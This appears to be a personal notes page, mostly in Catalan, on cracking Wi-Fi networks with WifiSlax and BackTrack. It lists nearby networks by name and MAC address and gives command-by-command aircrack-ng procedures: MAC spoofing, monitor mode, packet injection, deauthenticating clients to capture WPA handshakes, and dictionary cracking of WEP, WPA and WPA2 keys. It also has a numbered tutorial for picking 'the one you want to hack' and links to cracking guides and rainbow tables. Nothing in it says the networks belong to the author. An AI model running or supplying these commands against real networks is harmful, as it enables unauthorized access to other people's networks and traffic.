Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST NOTRAILERS RUNNING MTU:1500 Metric:1 RX packets:2179 errors:283030 dropped:0 overruns:0 frame:0 TX packets:2080731 errors:41 dropped:41 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1492165 (1.4 MiB) TX bytes:140732707 (134.2 MiB) Interrupt:11 Base address:0x4000 wifislax ~ # ping www.google.es PING www.l.google.com (209.85.229.99) 56(84) bytes of data. 64 bytes from ww-in-f99.google.com (209.85.229.99): icmp_seq=1 ttl=241 time=643 ms 64 bytes from ww-in-f99.google.com (209.85.229.99): icmp_seq=2 ttl=241 time=645 ms 64 bytes from ww-in-f99.google.com (209.85.229.99): icmp_seq=3 ttl=241 time=669 ms
Amunt! Top Amunt!
Pràctiques

Comandes auxiliars : lspci, startx, dmesg, iwlist, yast,

Drivers : T42/Intel BG = ipw2200 (device eth1) ; RAP/Canyon = rt2400 (device ra0) ; T400 = Intel 5100 AGN

802.11a/n ipw5100 man: 8086 dev: 4237 mini-PCIe Intel iwlagn

Xarxes que veig :

WLAN_GAS 00.23.F8.CD.9C.60 [ch9, sag] WLAN_F31A 64.68.0C.B8.F3.1D [ch 3] WLAN_EF 00.02.CF.75.FE.28 [ch 10] {5A303030324346373735324546} xrist 00.21.E9.B7.4E.75 [ch 6, 802.11n] WLAN_C5 00.19.15.4F.92.AA [ch 3] {ex-ca la x} estudi_AP 00.15.AF.64.54.BF [ch 1]

WEP-64 bits => 5 chars alfa, 10 hex; WEP-128 bits => 13 chars alfa, 26 hex.

WifiSlax boot :

iwconfig comprovar si es veu la tarja inalambrica rmmod ipw2200 treure Intel 2200BG modprobe ipw2200 rtap_iface=1 posar driver modinfo ipw2200 mostrar dades ifconfig ra0 down aturar tarja wifi macchanger -m 00:11:22:33:44:55 ra0 posar mac nova ("MAC_me") ifconfig ra0 up engegar tarja wifi iwconfig ra0 mode monitor posar en mode xafarder iwconfig wlan0 rate 1M decrease speed airodump-ng ra0 veure quines xarxes hi ha airodump-ng -w filename --channel 13 ra0 capturar una xarxa - veure terminal (00:14:95:B8:9E:29="MAC_TA") aireplay-ng -1 0 -e 2WIRE067 -a MAC_AP_TA -h MAC_me ath0 crear associacio per poder injectar trafic aireplay-ng -3 -b MAC_AP_TA -h MAC_me ath0 inyectar trafico aireplay-ng -1 0 -e weiio -a MAC -h MAC_me ra0 aircrack-ng kyokorn-02.cap obtener la clave iwconfig ath0 mode Managed key 21:53:10:19:49 usar la clave "WEP" ? usar la clave "WPA" ? dhcpcd ath0 obtener IP del AP *) airodump-ng -c 11 --SSID-NAME-HERE AP-MAC_HERE -w output ath0 *) aireplay-ng -1 0 -e SSID-NAME-HERE -a AP-MAC_HERE -h ADAPTER-MAC-HERE ath0 *) aireplay-ng -3 -b AP-MAC_HERE -h ADAPTER-MAC-HERE ath0 *) aircrack-ng -b SSID-NAME-HERE output*.ivs *) or aircrack-ptw output-01.cap

A vegades no es deix posar en mode tafaner :

root@bt:~# iwconfig wlan0 mode monitor Error for wireless request "Set Mode" (8B06) : SET failed on device wlan0 ; Device or resource busy.

Solucio : fer-ho amb el adaptador apagat.

El meu entorn (des 2010)
airodump-ng wlan0 CH 13 ][ Elapsed: 12 s ][ 2010-12-04 20:15 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:23:F8:CD:9C:60 -28 23 0 0 9 54 . WPA TKIP PSK WLAN_GAS 64:68:0C:B8:F3:1D -46 24 0 0 3 54 WPA TKIP PSK WLAN_F31A 00:21:E9:B7:4E:74 -48 27 0 0 6 54e. WPA2 CCMP PSK Xrist
T400 & F31A
iwconfig ; rmmod iwlagn ; modprobe iwlagn ; modinfo iwlagn ; ifconfig wlan0 down ; macchanger -m 00:11:22:33:44:55 wlan0 ; iwconfig wlan0 mode monitor ; ifconfig wlan0 up ; iwconfig ; airodump-ng wlan0 ; see available APs and clients airodump-ng wlan0 -c 9 -w filename ; listen just on one channel and save IVs aireplay-ng -1 0 -a 64:68:0C:B8:F3:1D -h 00:11:22:33:44:55 wlan0 ; crear asociacio aireplay-ng -3 -b 64:68:0C:B8:F3:1D -h 00:11:22:33:44:55 wlan0 ; inyectar trafico aircrack-ng -b (bssid) filename.cap ; encontrar clave
T400 & Xrist (WPA2)
iwconfig ; rmmod iwlagn ; modprobe iwlagn ; modinfo iwlagn ; ifconfig wlan0 down ; macchanger -m 00:11:22:33:44:55 wlan0 ; iwconfig wlan0 mode monitor ; ifconfig wlan0 up ; iwconfig ; airodump-ng wlan0 ; see available APs and clients airodump-ng wlan0 -c 9 ; listen just on one channel airodump-ng -c 9 --bssid 00:21:E9:B7:4E:74 -w psk wlan0 ; capture the 4-way authentication handshake and save it to file aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:DB:C2 wlan0 ; des-autenticar el cliente del AP aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap ; encontrar clave

When we capture it, we shall see:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
Amunt! Top Amunt!
crak WPA
  1. Wireless card that supports promiscuous mode
    Check compatibility here
  2. dictionary file (backtrack comes with a couple)
  3. download the BackTrack 4 flavor of your choice.
  4. boot up backtrack - username: root password: toor
  5. Now type startx and press enter. This will log you into backtrack and you should now see the desktop.
  6. Open a command terminal and type in: airmon-ng Look for the name of your wireless card, its different for a lot of computers, mine is wlan0,
  7. type: airmon-ng stop wlan0
  8. type: macchanger --mac 00:11:22:33:44:55 wlan0
  9. type: airmon-ng start wlan0
  10. type: airodump-ng wlan0
    You will now see all of the wifi networks in range. once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack.
  11. type: airodump-ng -c (put the channel # here) -w wpahack --bssid (enter bssid here) wlan0
    Keep that window open,
  12. now open another command terminal and enter the following in the newly opened terminal: type: aireplay-ng -0 5 -a (enter bssid here) wlan0
  13. type: aircrack-ng wpahack.cap -w (path to a dictionary file) You should now see it attempting to crack the WPA key.

tutorial

crak WPA2

Tutorial: How to Crack WPA/WPA2

If you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols

crak WPA2 revisited 20180521

url

Amunt! Top Amunt!
Pending items

Crack WPA2 AP.

Amunt! Top Amunt!
Nets I know
Amunt! Top Amunt!
Links

Tutorial: Simple WEP Crack

Tutorial: How to crack WEP with no wireless clients + "Alternate Solution".

Intel 2200 "injection".

Chipset & drivers.

Seguridad Wi-Fi – WEP, WPA y WPA2 : PDF, url.

Cracking WPA, (es).

Diccionaris : Rainbow Tables for WPA-PSK Cracking (33,54 GB)

Updated 20141229